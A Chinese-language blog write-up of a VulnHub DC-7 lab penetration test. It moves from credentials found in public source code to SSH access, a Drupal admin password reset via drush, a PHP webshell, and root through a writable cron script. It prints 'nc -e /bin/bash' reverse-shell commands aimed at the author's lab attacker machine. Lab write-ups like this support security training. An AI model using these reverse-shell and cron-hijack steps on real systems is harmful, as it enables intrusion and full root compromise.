Vulnhub_DC-7靶机渗透测试

DC-7靶机

DC: 7 ~ VulnHub

信息收集
  1. 经过扫描得到IP地址为192.168.78.154.其中开启了ssh和80端口,看来立足点就在于web渗透找到漏洞,获取用户密码来进行ssh连接进行寻找提权方案了

image-20230622215745780

  1. 使用dirb扫描网址没什么收获
web渗透
  1. 访问网站,欢迎语是爆破登录没有用处,需要在盒子外面寻找答案,看样子网页没啥可以用的呢,但是突然发现左下角有一个Drupal。之前打过一个靶场可以利用MSF对drupal进行攻击获取meterpreter shell

image-20230622220133893

  1. 转移到下面发现一个@DCUSER,似乎是一个用户,去搜索发现竟然是一个github的用户,里面有这个网站的源码。好家伙要代码审计啊

image-20230622220719965

image-20230622220716524
  1. 根据经验之谈,多半会在配置文件中找到答案,来到配置文件,发现了用户和密码dc7user MdR3xOgB7#dW

image-20230622220805253

  1. 尝试进行登录,发现失败了,想起来还有开放ssh服务,进行ssh连接,成功登录了进去

image-20230622220903325

ssh信息收集
  1. 来到ssh登录界面,那必然要查看suid是否能利用提权的了,发现有exim4,在查看其版本 4.89,这不是和DC-4靶机提权方式一样么

image-20230622221421679

image-20230622221430382

  1. 使用相同的方法 wget下载提权脚本文件

image-20230622221511465

  1. 执行完后才发现,提权失败,返回的用户还是当前的登录账户

image-20230622221549751

  1. 很明显这个方法行不通,只能查看文件内容是否给出了提示了。查看目录文件发现一个mbox文件

image-20230622221828758

  1. 文件内提示有一个脚本文件,而且查看内容发现隔段时间就会有内容,猜测这个脚本是计划任务

image-20230622222014658

  1. 查看这个脚本的信息 ls -al 发现www权限用户就可以进行写入操作,属主是root,那样子获取www用户,写入反弹shell等待计划任务自动执行即可获取root的shell

image-20230623162234772

  1. 前去查看一下脚本文件,发现是一个定时任务的脚本,发现cd到了网页目录下,又使用了drush,据了解可以去到网页目录下修改用户的密码 命令drush user-password admin --password="123456" 发现提示修改成功,前往登录后台

image-20230622222043055

  1. 当然来到这里一瞬间也就想到了到网站目录下直接写一个webshell,来到目录下,没有vim 只能使用vi编写一个一句话木马,但是在保存的时候提示权限不够。看来这个方法也直接被扼杀了

image-20230622223643036

网站后台渗透
  1. 尝试进行登录 发现成功登录 admin 123456

image-20230622222324241

  1. 寻找到了可以修改网页内容的地方,但是尝试进行写入木马总是失败,通过搜索了解到,可以下载PHP插件来进行网页执行php代码,然后使用蚁剑连接小马网页 php安装包https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

image-20230622222633728

image-20230622222517573

image-20230622222432405

image-20230622222435571

  1. 再次来到编辑网页内容界面,查看下面发现可以进行php代码编辑,直接调用系统命令函数,执行反弹shell到kali主机上
<?php
system("nc -e /bin/bash 192.168.78.145 7777")
?>

image-20230623161642179

权限提升
  1. 寻找到之前在mbox文件中发现的脚本,cd /opt/scripts查看其权限,发现www用户可以写入,所有用户可执行,属主是root用户,是一个计划任务。可以想到之前为了获取www权限就是为了给脚本中写入反弹shell echo "nc -e /bin/bash 192.168.78.145 7777"

image-20230623162234772

image-20230623162046978

  1. 反弹shell的话,哪个用户执行了这个脚本,就会获取谁的权限,所以只能监听本地端口,静待着计划任务自动执行,执行的权限就是属主的root权限
  2. 因为mbox是邮件文件,所以前去/etc/mail查看之前一次执行是在什么时候。发现是在16.整,根据上面时间了解十五分钟后便会自动执行

image-20230623162326606

  1. 成功接受到了计划任务反弹回来的root的shell

image-20230623162427316

image-20230623162431207

收获
  1. 观察下面的信息,可能隐藏着某一位网上的作者
  2. 根据文件里的内容,判断脚本是计划任务
  3. Drupal修改网站的用户admin密码 drush user-password admin --password="123456" 需要去到网站目录下
  4. 网站后台下载可执行php代码的插件 可以直接调用系统命令函数 system 执行反弹shell
  5. 给一些属主为root权限的计划任务脚本添加反弹shell的命令 等待自动执行即可反弹shell
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值